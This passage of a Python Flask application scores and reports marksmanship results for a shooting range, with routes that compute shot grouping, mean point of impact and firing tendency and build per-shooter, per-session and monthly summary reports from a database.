mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_6', methods=['GET', 'POST'])
def update_6():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_7', methods=['GET', 'POST'])
def update_7():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/test_8', methods=['GET', 'POST'])
def update_8():
mp_2=0
gp_2=0
tyf_2=0
txf_2=0
f_2=0
xmpi_2=0
ympi_2=0
j_x_2=None
j_y_2=None
j_mp_2=None
up_res_2=None
mp_inch_2 = []
x2=[]
y2=[]
u_fir_tendency_txt_2=None
u_fir_tendency_code_2=None
if request.method == "POST":
data1 = request.get_json()
tx2 =data1['x1']
for le in tx2:
x2.append(le[0])
print("x2",file=sys.stderr)
print(x2,file=sys.stderr)
ty2 = data1['y1']
for le in ty2:
y2.append(le[0])
points = data1['points']
mp = mpi(1,points).tolist()
mp_inch_2.append(pixeltoinch(mp[0][0]))
mp_inch_2.append(pixeltoinch(mp[0][1]))
tmpi_2=mpi(1,points)
#print(tmpi, file=sys.stderr)
xmpi_1 = tmpi_2[0][0]
ympi_1 = tmpi_2[0][1]
session['tmpi_2']=mp
f_1,txf_list,tyf_list =firing_tendancy(1000, 1000 , xmpi_1, ympi_1)
txf_2=txf_list
tyf_2=tyf_list
j_x_2=pd.Series(txf_2).to_json(orient='values')
j_y_2=pd.Series(tyf_2).to_json(orient='values')
print("calling from update_2" ,file=sys.stderr)
print(txf_2,file=sys.stderr)
gp_2 = grouping_length(0 , 0 , x2 , y2)
up_res_2=getresulttext(gp_2)
u_fir_tendency_txt_2,u_fir_tendency_code_2 = getfiringtendencytext(f_2,txf_list,tyf_list)
session['x2'] = data1['x1']
print(j_x_2, file=sys.stderr)
session ['y2'] = data1['y1']
session['tf_u_2']=f_1
session['gp_u_2']=gp_2
session ['res_u_2']=up_res_2
session ['tfirer_x2']=u_fir_tendency_txt_2
session ['tfirer_y2']=u_fir_tendency_code_2
session ['tfirer_x1_f']=txf_2
session ['tfirer_y1_f']=tyf_2
return jsonify(mp = mp_inch_2 ,
gp_1=gp_2,
ten_yu=j_y_2,
ten_xu=j_x_2,
result=up_res_2,
u_fir_tendency=u_fir_tendency_txt_2
)
@app.route('/detail_summary', methods=['GET', 'POST'])
def detail_summary():
curdate=time.strftime("%Y-%m-%d")
shooting_1=db.session.query(TShooting.target_1_id).scalar()
shooting_2=db.session.query(TShooting.target_2_id).scalar()
shooting_3=db.session.query(TShooting.target_3_id).scalar()
shooting_4=db.session.query(TShooting.target_4_id).scalar()
shooting_5=db.session.query(TShooting.target_5_id).scalar()
shooting_6=db.session.query(TShooting.target_6_id).scalar()
shooting_7=db.session.query(TShooting.target_7_id).scalar()
shooting_8=db.session.query(TShooting.target_8_id).scalar()
detail_no=db.session.query(TShooting.detail_no).scalar()
set_no=db.session.query(TShooting.set_no).scalar()
session_no=db.session.query(TShooting.session_id).scalar()
paper_ref=db.session.query(TShooting.paper_ref).distinct().scalar()
shooter_name_1 =db.session.query(Shooter.name).filter(Shooter.id==shooting_1).scalar()
shooter_name_1 = make_empty_string_if_needed(shooter_name_1)
shooter_no_1 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_1).scalar()
shooter_no_1 = make_empty_string_if_needed(str(shooter_no_1))
result_1=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_1,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref
).scalar()
result_1 = make_empty_string_if_needed(result_1)
gp_1=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_1,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref
).scalar()
gp_1 = make_empty_string_if_needed(str(gp_1))
mpi_x_1=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_1,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref
).scalar()
mpi_x_1=make_empty_string_if_needed(str(mpi_x_1))
mpi_y_1=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_1,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref
).scalar()
mpi_y_1 = make_empty_string_if_needed(str(mpi_y_1))
ten_1=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_1,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_1 = make_empty_string_if_needed(ten_1)
shooter_name_2 =db.session.query(Shooter.name).filter(Shooter.id==shooting_2).scalar()
shooter_name_2 = make_empty_string_if_needed(shooter_name_2)
shooter_no_2 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_2).scalar()
shooter_no_2 = make_empty_string_if_needed(str(shooter_no_2))
result_2=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_2,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_2 = make_empty_string_if_needed(result_2)
gp_2=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_2,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_2 = make_empty_string_if_needed(str(gp_2))
mpi_x_2=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_2,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_2=make_empty_string_if_needed(str(mpi_x_2))
mpi_y_2=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_2,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_2 = make_empty_string_if_needed(str(mpi_y_2))
ten_2=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_2,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_2 = make_empty_string_if_needed(ten_2)
shooter_name_3 =db.session.query(Shooter.name).filter(Shooter.id==shooting_3).scalar()
shooter_name_3 = make_empty_string_if_needed(shooter_name_3)
shooter_no_3 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_3).scalar()
shooter_no_3 = make_empty_string_if_needed(str(shooter_no_3))
result_3=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_3,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_3 = make_empty_string_if_needed(result_3)
gp_3=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_3,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_3 = make_empty_string_if_needed(str(gp_3))
mpi_x_3=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_3,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
MPI.target_no==3
).scalar()
mpi_x_3=make_empty_string_if_needed(str(mpi_x_3))
mpi_y_3=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_3,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_3 = make_empty_string_if_needed(str(mpi_y_3))
ten_3=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_3,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_3 = make_empty_string_if_needed(ten_3)
shooter_name_4 =db.session.query(Shooter.name).filter(Shooter.id==shooting_4).scalar()
shooter_name_4 = make_empty_string_if_needed(shooter_name_4)
shooter_no_4 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_4).scalar()
shooter_no_4 = make_empty_string_if_needed(str(shooter_no_4))
result_4=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_4,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_4 = make_empty_string_if_needed(result_4)
gp_4=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_4,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_4 = make_empty_string_if_needed(str(gp_4))
mpi_x_4=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_4,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_4=make_empty_string_if_needed(str(mpi_x_4))
mpi_y_4=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_4,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_4 = make_empty_string_if_needed(str(mpi_y_4))
ten_4=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_4,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_4 = make_empty_string_if_needed(ten_4)
shooter_name_5 =db.session.query(Shooter.name).filter(Shooter.id==shooting_5).scalar()
shooter_name_5 = make_empty_string_if_needed(shooter_name_5)
shooter_no_5 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_5).scalar()
shooter_no_5 = make_empty_string_if_needed(str(shooter_no_5))
result_5=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_5,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_5 = make_empty_string_if_needed(result_5)
gp_5=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_5,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_5 = make_empty_string_if_needed(str(gp_5))
mpi_x_5=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_5,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_5=make_empty_string_if_needed(str(mpi_x_5))
mpi_y_5=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_5,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_5 = make_empty_string_if_needed(str(mpi_y_5))
ten_5=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_5,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_5 = make_empty_string_if_needed(ten_5)
shooter_name_6 =db.session.query(Shooter.name).filter(Shooter.id==shooting_6).scalar()
shooter_name_6 = make_empty_string_if_needed(shooter_name_6)
shooter_no_6 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_6).scalar()
shooter_no_6 = make_empty_string_if_needed(str(shooter_no_6))
result_6=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_6,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_6 = make_empty_string_if_needed(result_6)
gp_6=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_6,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_6 = make_empty_string_if_needed(str(gp_6))
mpi_x_6=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_6,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_6=make_empty_string_if_needed(str(mpi_x_6))
mpi_y_6=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_6,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_6 = make_empty_string_if_needed(str(mpi_y_6))
ten_6=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_6,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_6 = make_empty_string_if_needed(ten_6)
shooter_name_7 =db.session.query(Shooter.name).filter(Shooter.id==shooting_7).scalar()
shooter_name_7 = make_empty_string_if_needed(shooter_name_7)
shooter_no_7 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_7).scalar()
shooter_no_7 = make_empty_string_if_needed(str(shooter_no_7))
result_7=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_7,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_7 = make_empty_string_if_needed(result_7)
gp_7=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_7,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_7 = make_empty_string_if_needed(str(gp_7))
mpi_x_7=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_7,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_7=make_empty_string_if_needed(str(mpi_x_7))
mpi_y_7=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_7,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_7 = make_empty_string_if_needed(str(mpi_y_7))
ten_7=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_7,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_7 = make_empty_string_if_needed(ten_7)
shooter_name_8 =db.session.query(Shooter.name).filter(Shooter.id==shooting_8).scalar()
shooter_name_8 = make_empty_string_if_needed(shooter_name_8)
shooter_no_8 =db.session.query(Shooter.service_id).filter(Shooter.id==shooting_8).scalar()
shooter_no_8 = make_empty_string_if_needed(str(shooter_no_8))
result_8=db.session.query(Grouping.result).filter(
Grouping.firer_id==shooting_8,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
result_8 = make_empty_string_if_needed(result_8)
gp_8=db.session.query(Grouping.grouping_length_f).filter(
Grouping.firer_id==shooting_8,
Grouping.date==curdate,
Grouping.session_id==session_no,
Grouping.detail_no==detail_no,
Grouping.spell_no==set_no,
Grouping.paper_ref==paper_ref,
).scalar()
gp_8 = make_empty_string_if_needed(str(gp_8))
mpi_x_8=db.session.query(MPI.f_mpi_x).filter(
MPI.firer_id==shooting_8,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_x_8=make_empty_string_if_needed(str(mpi_x_8))
mpi_y_8=db.session.query(MPI.f_mpi_y).filter(
MPI.firer_id==shooting_8,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
mpi_y_8 = make_empty_string_if_needed(str(mpi_y_8))
ten_8=db.session.query(MPI.tendency_text).filter(
MPI.firer_id==shooting_8,
MPI.date==curdate,
MPI.session_id==session_no,
MPI.detail_no==detail_no,
MPI.spell_no==set_no,
MPI.paper_ref==paper_ref,
).scalar()
ten_8 = make_empty_string_if_needed(ten_8)
return render_template('pages/detail_summary.html',
shooter_name_1=shooter_name_1,
shooter_no_1=shooter_no_1,
result_1=result_1,
gp_1=gp_1,
mpi_x_1=mpi_x_1,
mpi_y_1=mpi_y_1,
ten_1=ten_1,
shooter_name_2=shooter_name_2,
shooter_no_2=shooter_no_2,
result_2=result_2,
gp_2=gp_2,
mpi_x_2=mpi_x_2,
mpi_y_2=mpi_y_2,
ten_2=ten_2,
shooter_name_3=shooter_name_3,
shooter_no_3=shooter_no_3,
result_3=result_3,
gp_3=gp_3,
mpi_x_3=mpi_x_3,
mpi_y_3=mpi_y_3,
ten_3=ten_3,
shooter_name_4=shooter_name_4,
shooter_no_4=shooter_no_4,
result_4=result_4,
gp_4=gp_4,
mpi_x_4=mpi_x_4,
mpi_y_4=mpi_y_4,
ten_4=ten_4,
shooter_name_5=shooter_name_5,
shooter_no_5=shooter_no_5,
result_5=result_5,
gp_5=gp_5,
mpi_x_5=mpi_x_5,
mpi_y_5=mpi_y_5,
ten_5=ten_5,
shooter_name_6=shooter_name_6,
shooter_no_6=shooter_no_6,
result_6=result_6,
gp_6=gp_6,
mpi_x_6=mpi_x_6,
mpi_y_6=mpi_y_6,
ten_6=ten_6,
shooter_name_7=shooter_name_7,
shooter_no_7=shooter_no_7,
result_7=result_7,
gp_7=gp_7,
mpi_x_7=mpi_x_7,
mpi_y_7=mpi_y_7,
ten_7=ten_7,
shooter_name_8=shooter_name_8,
shooter_no_8=shooter_no_8,
result_8=result_8,
gp_8=gp_8,
mpi_x_8=mpi_x_8,
mpi_y_8=mpi_y_8,
ten_8=ten_8
)
@app.route('/firer_detail_report', methods=['GET', 'POST'])
def firer_detail_report():
firer = [row.service_id for row in Shooter.query.all()]
if request.method=='POST':
r=request.form['tag']
firer_id=db.session.query(Shooter.id).filter(Shooter.service_id==r).scalar()
firer_name=db.session.query(Shooter.name).filter(Shooter.service_id==r).scalar()
firer_brigade=db.session.query(Shooter.brigade).filter(Shooter.service_id==r).scalar()
firer_unit=db.session.query(Shooter.unit).filter(Shooter.service_id==r).scalar()
firer_rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==r).scalar()
rank=db.session.query(Rank.name).filter(Rank.id==firer_rank_id).scalar()
cant_id = db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==r).scalar()
cant_name=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
div_name=db.session.query(Cantonment.division).filter(Cantonment.id==cant_id).scalar()
gp_g=db.session.query(Grouping.date,Grouping.detail_no,
Grouping.result,Grouping.grouping_length_f,MPI.tendency_text).filter(Grouping.firer_id==firer_id,
MPI.firer_id==firer_id,
Grouping.firer_id==MPI.firer_id,
Grouping.detail_no==MPI.detail_no,
Grouping.target_no==MPI.target_no,
Grouping.spell_no==MPI.spell_no,
Grouping.paper_ref==MPI.paper_ref,
Grouping.date==MPI.date
).all()
print(gp_g,file=sys.stderr)
return render_template('pages/firer_detail_report.html' , firer=firer, gp_g=gp_g,rank=rank,r=r,firer_name=firer_name,firer_brigade=firer_brigade,firer_unit=firer_unit,cant_name=cant_name, div_name= div_name)
return render_template('pages/firer_detail_report.html' , firer=firer)
@app.route('/montly_session_summary', methods=['GET', 'POST'])
def montly_session_summary():
form=MonthlyReportForm()
session_detail=None
table_box=[]
distinct_army_num_arr=[]
distinct_detail_num_arr=[]
try:
if request.method == 'POST':
date=form.start_time.data
print("date",file=sys.stderr)
print(date,file=sys.stderr)
detail_no=db.session.query(Grouping.detail_no).filter(Grouping.date==date).all()
firer_no=db.session.query(Grouping.firer_id).filter(Grouping.date==date).all()
session_detail=db.session.query(Shooter.service_id,Shooter.name,
Grouping.detail_no,
Grouping.result,
Grouping.grouping_length_f).filter(
Shooter.id==Grouping.firer_id,
Grouping.date==date
).all()
distinct_detail_num=db.session.query(Session_Detail.detail_no).filter(
Session_Detail.date==date ).distinct(Session_Detail.detail_no).all()
for e in distinct_detail_num:
for e4 in e:
distinct_detail_num_arr.append(e4)
distinct_army_num=db.session.query(Shooter.service_id).filter(
Shooter.id==Grouping.firer_id,
Session_Detail.date==date,
Grouping.date==date
).distinct(Shooter.service_id).all()
for e5 in distinct_army_num:
for e6 in e5:
distinct_army_num_arr.append(e6)
for tarmy_no in distinct_army_num_arr:
box_line = []
box_line.append(tarmy_no)
tfirer_name=db.session.query(Shooter.name).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_brigade=db.session.query(Shooter.brigade).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_unit=db.session.query(Shooter.unit).filter(Shooter.service_id==tarmy_no).scalar()
cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==tarmy_no).scalar()
cantonment=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
div=db.session.query(Cantonment.division).filter(Cantonment.id==cant_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
print(tfirer_rank,file=sys.stderr)
box_line.append(tfirer_name)
box_line.append(tfirer_rank)
box_line.append(cantonment)
box_line.append(div)
box_line.append(tfirer_brigade)
box_line.append(tfirer_unit)
for tdetail_no in distinct_detail_num_arr:
tdetail_data = get_a_line_for_box(session_detail, tarmy_no, tdetail_no)
for te in tdetail_data:
box_line.append(te)
table_box.append(box_line)
print("---------")
print(table_box)
except Exception as e:
return render_template('errors/monthly_session_error.html')
return render_template('pages/monthly_session_summary.html',form=form,detail_no_f=distinct_detail_num_arr,box =table_box )
@app.route('/session_summary', methods=['GET', 'POST'])
def session_summary():
curdate=time.strftime("%Y-%m-%d")
s_no=db.session.query(Shooting_Session.session_no).all()
session_detail=None
table_box=[]
s_arr=[]
distinct_army_num_arr=[]
distinct_detail_num_arr=[]
for ele in s_no:
for ele2 in ele:
s_arr.append(ele2)
if request.method == 'POST':
no = request.form.get('comp_select4')
detail_no=db.session.query(Session_Detail.detail_no).filter(Session_Detail.session_id==no).all()
firer_no=db.session.query(Grouping.firer_id).filter(Grouping.session_id==no).all()
session_detail=db.session.query(Shooter.service_id,
Shooter.name,
Grouping.detail_no,
Grouping.result,
Grouping.grouping_length_f).filter(
Shooter.id==Grouping.firer_id,
Grouping.session_id==no
).all()
distinct_detail_num=db.session.query(Session_Detail.detail_no).filter(
Session_Detail.session_id==no ).distinct(Session_Detail.detail_no).all()
for e in distinct_detail_num:
for e4 in e:
distinct_detail_num_arr.append(e4)
distinct_army_num=db.session.query(Shooter.service_id).filter(
Shooter.id==Grouping.firer_id,
Session_Detail.session_id==no,
Grouping.session_id==no
).distinct(Shooter.service_id).all()
for e5 in distinct_army_num:
for e6 in e5:
distinct_army_num_arr.append(e6)
for tarmy_no in distinct_army_num_arr:
box_line = []
box_line.append(tarmy_no)
tfirer_name=db.session.query(Shooter.name).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_brigade=db.session.query(Shooter.brigade).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_unit=db.session.query(Shooter.unit).filter(Shooter.service_id==tarmy_no).scalar()
cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==tarmy_no).scalar()
cantonment=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
div=db.session.query(Cantonment.division).filter(Cantonment.id==cant_id).scalar()
rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==tarmy_no).scalar()
tfirer_rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
print(tfirer_rank)
box_line.append(tfirer_name)
box_line.append(tfirer_rank)
box_line.append(cantonment)
box_line.append(div)
